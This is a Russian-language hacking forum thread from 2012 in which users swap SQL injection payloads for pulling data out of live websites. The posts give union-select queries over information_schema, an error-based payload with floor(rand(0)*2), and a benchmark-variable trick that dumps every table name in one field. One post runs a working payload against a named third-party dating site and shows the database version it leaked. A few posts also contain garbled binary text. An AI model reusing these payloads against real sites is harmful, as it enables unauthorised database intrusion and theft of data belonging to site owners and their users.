
09.02.2012, 00:17
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от sl1k
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .
а у тебя случяйно не blind injection??
|
|
|

09.02.2012, 00:25
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от ivan151
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
|
|
|

09.02.2012, 00:43
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...
а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?
P.S Error-based тоже юзал..
|
|
|

09.02.2012, 00:47
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от pirat0
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
юзай mid()
а вообще LIMIT бы не мешало сначала
|
|
|

09.02.2012, 01:34
|
|
Познающий
Регистрация: 07.09.2010
Сообщений: 30
С нами:
8252246
Репутация:
0
|
|
Есть идеи как нибудь раскрутить это?
Сообщение от None
http://www.datingtop.net/index.php?id=10'
|
|
|

09.02.2012, 01:57
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
С нами:
8832539
Репутация:
0
|
|
Сообщение от pirat0
а у тебя случяйно не blind injection??
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґ
|
|
|

09.02.2012, 02:12
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от TYPUCT
Есть идеи как нибудь раскрутить это?
http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+
Код:
Duplicate entry '5.0.92-community' for key 1
|
|
|

09.02.2012, 02:23
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
[QUOTE="sl1k"]
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ
|
|
|

09.02.2012, 02:33
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
С нами:
8832539
Репутация:
0
|
|
Сообщение от pirat0
ты руками выводиш или прогой??
и руками и прогой
|
|
|

09.02.2012, 13:22
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от ivan151
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)
где 666 - кол-во строк не более максимального значения в таблице.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|